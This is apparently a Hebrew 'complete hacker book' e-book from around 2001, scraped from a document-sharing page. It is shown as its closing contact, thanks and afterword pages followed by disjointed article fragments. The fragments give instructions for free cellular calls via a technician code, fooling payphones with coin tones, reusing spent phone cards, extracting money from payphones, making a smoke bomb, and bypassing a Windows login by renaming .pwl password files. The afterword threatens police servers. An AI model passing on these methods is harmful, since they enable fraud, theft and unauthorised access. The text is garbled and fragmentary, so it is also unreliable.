‫נגמרו הכתבות ‪ ,‬עכשיו נעבור לשלושת העמודים המסיימים את הספר ‪...‬‬
‫איך ליצור קשר ‪:‬‬
‫אוקי ‪ ...‬אני לא אענה על שאלות כמו ‪:‬‬

‫‪.1‬תפרוץ לי בבקשה ‪.‬‬
‫‪.2‬שכחתי את הסיסמא של האי מאייל אנא תעזור לי‬
‫‪.3‬אני חייב שתפרוץ לי לאנשהו‬
‫‪.4‬אני ישלם לך בעד שתפרוץ‬
‫‪.5‬ועוד שטויות מהסוג הזה‬
‫אני לא מבטיח לענות לכל אחד אבל מבטיח לנסות אז ככה ‪...‬‬
‫אני הולך לפרסם את האי סי קיו שלי ואני יודע שהוא הולך להיות מוצף באנשים אז חבר'ס בבקשה‬
‫אל תעלבו אם אני לא עונה ‪ ...‬יש לי עכשיו קרוב ל‪ 30‬אנשים און‪-‬ליין ‪...‬‬
‫‪my icq - 124157810‬‬
‫לתגובות‪ ,‬להסביר כמה שאת\ה אוהבת אותי או כמה שאת\ה שונאת אותי ‪ -‬בקיצור כל מה שלא קשור‬
‫לשאלות שלחו לי ל ‪:‬‬
‫‪efraim abramov@inbox.net‬‬
‫לשאלות תשלחו איי מאייל ל ‪:‬‬
‫‪hacker@asm.net‬‬
‫ומי שרוצה להצטרף לכותבי הספר הבא ( כנראה שנה הבאה ) אנא שלחו כתבות גם ל ‪:‬‬
‫‪efraim abramov@inbox.net‬‬
‫אם תרצו ליצור קשר עם אחד ההאקרים\קראקרים האחרים בספר שלחו לי הודעה עם השאלה ואני‬
‫כבר יצור את הקשר בניכם ‪...‬‬

‫תודות‬
‫זהו אין יותר עבודה עד ‪ 2:30‬בלילה ‪ -‬עכשיו נשאר רק לכתוב תודות ()‪:‬‬
‫טוב קדימה‪ ,‬נתחיל זה ארוך ‪....‬‬
‫תודה ענקית למי שבלעדיהם לא היה לכם את הספר ‪:‬‬
‫‪gehenom, blood runner, rul3r, pirs[i]ng, e-man , aiti , dr.brain , jacob, asc, batman911, sbh,‬‬
‫‪catax, bentz, y0g1 b3ar, icefire3k, rel8t, milki, aka, vb-man, cool-guy, zeos, bor|s, wamaw,‬‬
‫‪panchermaher, boba smith, ^dak0da^, zebra, vortex, the-mod, ndr311, counter and to all the‬‬
‫‪. hackers in the world‬‬
‫ועכשיו נעבור לתודות בעברית ‪:‬‬
‫פנצ'ו‪ ,‬ניב ואשד ( התותחים הכי כבדים ‪,) ‬יוליה‪ ,‬אלה‪ ,‬גלה‪ ,‬גלית‪ ,‬אלי ‪ ,‬בן‪-‬לאדן ( השובב) ותודה‬
‫ענקית אחרונה למפכ"ל המשטרה (‪. :‬‬
‫סוף דבר‬
‫זהו זה עומד להסתיים עוד כמה רגעים‪ ,‬החלום שלי יתגשם סוף סוף‬
‫והספר יופץ ברחבי הנט ‪.‬‬
‫הספר הזה נכתב בשביל שלכם\ן יהיה את הכוח לדעת‪ ,‬מי שקרא את הספר הוא לא האקר ‪ -‬בשביל‬
‫להיות האקר את\ה צריך\ה ללמוד עוד הרבה דברים‪ ,‬בעיקר לשנות את דפוסי ההתנהגות‪ ,‬פעם שאלו‬
‫אותי איך זה להיות האקר וכך אמרתי ‪:‬‬
‫האם ראיתם את הסרט ‪ ? hackers‬אם כן זה דיי דומה אבל החלק השונה הוא שלרוב הפריצות הם‬
‫הרבה יותר קשות אבל הקטעים עם החברים והטלפוניה מזכירים במקצת את התרבות שלנו ‪ -‬אני‬
‫ממליץ לכולם לראות את הסרט ולהבין ‪.‬‬
‫זה הספר הראשון בעברית על האקינג (גם לא ידוע לי שיש באנגלית)‬

‫ונראה לי שזה יהיה האחרון ( הגמדים השמנים הכחולים בטח ירדפו אחריי‪ )...‬אבל אני מבטיח שאם‬
‫לספר זה יהיה פופלריות גדולה אנחנו נכתוב ספר בשנה הבאה ‪.‬‬
‫אז אני לא טוב בפרידות אבל זה הולך ככה (‪:‬‬
‫החלום התגשם ו ‪ 200 -‬ע"מ של האקינג\קראקינג\פריקינג\אנרכייה מחולקים בחינם לכל אדם ברחבי‬
‫הנט ‪ -‬הכחולים יעשו בעיות ואולי יתפסו אחד מאיתנו‪ ,‬אני מזהיר שאם הם יטפלו באחד‬
‫ההאקרים בגלל הספר הסרבר שלהם יצטרך להזיע כמו שבן‪-‬לאדן עכשיו מזיע בתוך האהל שלו !‬
‫אני מבקש מכל ממך להפיץ את הספר לכמה שיותר אנשים וזה רק בגלל שהרעיון של הספר הוא‬
‫הפצת המידע בחינם לכל דורש ‪.‬‬
‫תודה לכם על זה שקראתם את הספר‪ ,‬מקווה שנהניתן\ם ‪.‬‬
‫‪eof‬‬

ספר ההאקרים השלם בעברית

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

ספר ההאקרים השלם בעברית

Uploaded by

Copyright:

Available Formats

‫ספר‬

‫‪ -‬עובד ברשתות תקשורות במוסד גדול ‪.‬‬ ‫יעקב‬

‫עמוד‬ ‫שם המאמר‬ ‫כותב‬

‫טוב ‪ ,‬אני מאמין שכל אחד חלם לעשות את זה ‪...‬‬

‫טוב נתחיל ‪:‬‬

‫אתה הולך ל ‪.run‬‬

‫אז נפתח לך חלון ‪dos‬‬

‫ואם זה לא מצליח אנא צרו קשר איתי ב‪icq 106836363‬‬

‫נכנסים אליה והולכים ל‬

‫‪]by old-hacker [i.c.f‬‬

‫בדקתי את זה וברשת סלקום זה עובד בטוח ‪ -‬נכון ל ‪ 7‬באפריל ‪. 2001‬‬

‫‪.1‬כותבים קוד טכנאי שהוא‬

‫‪.2‬הולכים בתפריט ל ‪emergency numbers‬‬

‫וזהו ‪ ...‬יש לכם שיחות חינם ‪ ,‬תדברו חופשי ‪...‬‬

‫‪]by old-hacker [i.c.f‬‬

‫‪ .1‬צליל של ‪ - coin collet‬אפשר להוריד בפינת ההורדות באתר שלי ‪.‬‬

‫קודם כל מקליטים בבית על מכשיר ההקלטה (למשל ווקמן ) את הצליל‬

‫אני אלמד אתכם עכשיו איך להכין פצצת עשן !!‬

‫לוקחים ת' מחברת ומפרקים לה את הצורה ‪ -‬סתם‪...‬‬

‫‪ .1‬לוקחים את הקרטון וחותכים מרובע ‪.‬‬

‫& = עיסה של הדבק והחול ‪.‬‬

‫‪]by old-hacker [i.c.f‬‬

‫לחצו על התחל‪ ,‬אפשרויות‪ ,‬לוח בקרה‪.‬‬

‫‪ =====---‬לא‪ ,‬לא נכון! =====‪---‬‬

‫אני אראה לכם פה כמה שיטות‪ ,‬אנא נסו את כולם‪.‬‬

‫שיטה מספר ‪1‬‬

‫* התחילו את המחשב מהתחלה‬

‫* לחצו ברציפות על כפתור ה ‪ f5‬הרבה פעמים בלי להפסיק‪.‬‬

‫מה שיקרה זה שהוונידוס יתחיל במצב ‪safe mode‬‬

‫* לחצו ברציפות על כפתור ה ‪ f8‬הרבה פעמים בלי להפסיק‪.‬‬

‫‪rename c:\windows\*.pwl c:\windows\*.xxx‬‬

‫מה שבעצם קורה פה זה הדבר הבא‪:‬‬

‫‪rename c:\windows\*.pwl c:\windows\*.fuk‬‬

‫אני חושב שקלטתם את הרעיון‪...‬‬

‫‪rename c:\windows\*.xxx c:\windows\pwl‬‬

‫או אם שיניתם ל ‪ .fuk‬אז הקלידו את זה כך‪:‬‬

‫‪rename c:\windows\*.fuk c:\windows\pwl‬‬

‫שיטה מספר ‪3‬‬

‫שיטה מספר ‪ 3‬מבוססת על שיטה מספר ‪.2‬‬

‫* התחילו את המחשב מהתחלה‬

‫* לחצו ברציפות על כפתור ה ‪ f8‬הרבה פעמים בלי להפסיק‪.‬‬

‫זהו‪ ,‬סיימנו לכתבה הזאת‪ ,‬ורק לסיכום‪,‬‬

‫מכירים את המכשירים האלה ששמים שקל ואז אפשר להתקשר?‬

‫מה קורה פה?‬

‫הכסף יתחיל להתגלגל החוצה בדיוק כמו בסרטים!!!!!‬

‫* מומלץ ללבוש בגדים שחורים‪.‬‬

‫* מומלץ לבוא עם אופנוע‪.‬‬

‫אז עד הפעם הבאה‪,‬‬

‫אוהבים את ג'יימס בונד? אני לא‪.‬‬

‫* פלאפון מדגם ‪ 5110‬של נוקיה‬

‫* את הכתבה הזאת (מומלץ להדפיס)‬

‫לחצו על תפריט ‪tools‬‬

‫כשהדפדן פתוח‪ ,‬עשו את הצעדים הבאים‪:‬‬

‫כ‪-‬ע‪-‬ת תלמדו איך להשתמש בכרטיסי טלכרט שנגמרו'‪.‬‬

‫שיטה שנייה למחזור טלכרטים‪...‬‬

‫בכתבה הזאת‪ ,‬הכתבה הכי טובה עד עכשיו אם תשאלו אותי‪,‬‬

‫* מליוני אנשים רשומים אליהם‪.‬‬

‫בכדי שנוכל להתחיל‪ ,‬אם אתם עוד לא רשומים‬

‫* לחצו על תפריט ההתחל‬

‫‪http = hyper text transfer protocol‬‬

‫‪smtp = simple mail transfer protocol‬‬

‫‪rfc = request for comments‬‬

‫‪ :host name‬הקלידו כאן את כתובת השרת‪ .‬במקרה שלנו ‪mail.hotmail.com‬‬

‫‪rename c:\windows\.pwl c:\windows\.xxx‬‬

‫‪rename c:\windows\.pwl c:\windows\.fuk‬‬